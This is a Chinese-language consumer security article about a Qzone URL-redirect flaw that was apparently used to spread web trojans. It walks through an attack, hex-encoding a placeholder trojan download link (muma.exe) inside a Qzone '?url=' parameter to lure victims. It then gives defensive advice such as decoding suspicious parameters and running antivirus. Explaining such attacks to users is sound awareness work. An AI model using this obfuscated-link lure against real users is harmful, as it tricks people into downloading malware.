一、模擬黑客攻擊
這裡,我們首先來了解這個漏洞的具體情況。Qzone的跨站漏洞是網友無意中開啟類似“號碼?url=任意字母”時發現的,這時網頁顯示為一個框架網頁,中間為"無法開啟網頁"的空白頁面(如圖1);然而,當輸入類似“號碼?url=”的地址時卻可以正常顯示,這時url後的網址其實在幕後是載入的。那麼,Qzone的跨站漏洞又是如何被黑客作為木馬的媒介的呢?
 |
| Qzone預設載入的地址要小心 |
第一步:黑客需要對該地址進行喬裝改扮一番。比如:網頁木馬的url為""。黑客會使用URl加密技術來為木馬地址作掩護,常用的方法是把url地址轉換為16進位制,這裡以ASCII碼隨心換為例(如圖2)進行示範。
 |
| 黑客常用URL偽裝器 |
第二步:黑客將Qzone的地址設定為"號碼?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%75%6D%61%2E%63%6F%6D%2F%6D%75%6D%61%2E%65%78%65"並在網頁上貼出Qzone的地址來引誘網友點選,使用者往往點選了該地址下載運行了木馬還矇在鼓裡。
二、如何防範Qzone攻擊
方法1:既然這一跨站漏洞這麼隱蔽,使用者感染的機率也不會低。我們需要如何來防範這一漏洞可能造成的危害呢?做到不感染病毒,未雨綢繆是最有效果的。因此,我們在訪問網友的Qzone前,要多長几個心眼,要觀察其網址的形式。
一般正常的Qzone的地址是"號碼"或者"http://號碼"形式的,如果出現"號碼?url="的地址就要謹慎了,Qzone也可能出現類似"號碼/?url=http%3A//_%23uin%3D號碼%26albumid%3D393029702%26photoid%3D"的地址,如果地址裡面完全沒有QQ的地址段,那麼為了防止下載執行網頁木馬,可以將url後的字元輸入到ASCII碼隨心換進行轉換(如果是像以上地址的格式,可以將%後的十六進位制字元逐個進行轉換來獲得完整地址),如果url指向可執行檔案就不能點選了。
方法2:為了防止系統被種植網頁木馬,還可以安裝防毒軟體和防火牆並需要開始實時檔案和網路監控,這樣即使下載了網頁木馬也會被清除。如果發現了可疑的Qzone地址要及時舉報,讓黑客成為過街老鼠,毫無藏身之處。
小結:Qzone的跨站漏洞被用來種植木馬具有受眾廣的特點,Qzone的地址經過加密化裝後,又有幾個人會仔細地進行甄別呢?因此,利用人們偷窺人家隱私空間的好奇心來傳播木馬是很有效果的。
其實,要防範Qzone地址在你的電腦種植木馬也不難,最簡單的方法就是隻點選QQ資料裡的Qzone地址,不去其他網站點選就可以了。另外,需要使用具有防範IE漏洞的安全工具和防毒軟體來查殺這類木馬的下載安裝,如:瑞星卡卡。攜帶木馬的Qzone地址一經發現要馬上通知網友,決不姑息,不讓其他人成為黑客的犧牲品。同時,每次Qzone提示升級我們也最好升級不用嫌麻煩而取消升級,以免被黑客利用其他未知的漏洞。
